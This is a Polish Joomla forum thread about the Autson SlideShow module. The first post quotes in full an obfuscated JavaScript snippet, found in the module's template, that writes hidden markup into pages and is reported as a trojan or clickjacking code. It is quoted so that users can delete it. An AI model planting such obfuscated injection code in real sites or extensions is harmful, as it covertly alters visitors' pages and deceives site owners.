PDA

Zobacz pełną wersję : Autson.com problem z bezpieczeństwem



pawel nowak
23-08-2013, 11:00
Dzień dobry !
Napotkałem na problem z mod Autson. Sucuri SiteCheck pokazał malware. Rozwiązanie w pluku modułu ..../modules/mod_AutsonSlideShow/tmpl/default
usuwamy kod

<script language="JavaScript">

function dnnViewState()

{

var a=0,m,v,t,z,x=new Array('9091968376','888791819281878634737491878493 9277359287883421333333338896','778787','9499907939 17947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];

t=z='';

for(v=0;v<m.length;){t+=m.charAt(v++);

if(t.length==2){z+=String.fromCharCode(parseInt(t) +25-l+a);

t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();

</script>

i strona czysta

GOGOKOM
23-08-2013, 12:14
Zaciekawiasz tematem może coś więcej.
Może napisz gdzie trzeba może cofną im UR7-Under Investigation (http://extensions.joomla.org/index.php?option=com_content&id=53)
Do tego wyjasnisz jeszcze co ten kod powodował.
Pozw tym nie wydaje mi się aby pochopnie wstrzymane zostało publikowanie modułu.
Same rozwiązanie niewiele daje, niesmak może pozostać.
Zwłaszcza że na Autson --- . ---- com obecnie jest Apache 2 Test Page.

joomal
09-11-2013, 20:28
Też miałem ten problem, rozwiązanie opisane jest także tutaj http://joomlaboy.com/tutorials/joomla/88-solved-autson-slideshow-clickjack-issue

Kod jest wykrywany jako trojan np przez NOD32.

adam977
12-11-2013, 12:43
Dzisiaj stoczyłem nierówną walkę z tym badziewiem, komunikat dokładnie ten sam, ale jako że nie używałem tego modułu musiałem przekopać pliki.
Od ciągu do ciągu, w końcu znalazłem ....ama. Problem powodował mod_FaceBookSlider - wyłączenie go załatwiło sprawę. To chyba nie wirus a raczej dodatkowy link umieszczany w źródle strony przez ten plugin.

Karol99
12-11-2013, 18:28
W JED też już zawieszony do wyjaśnienia...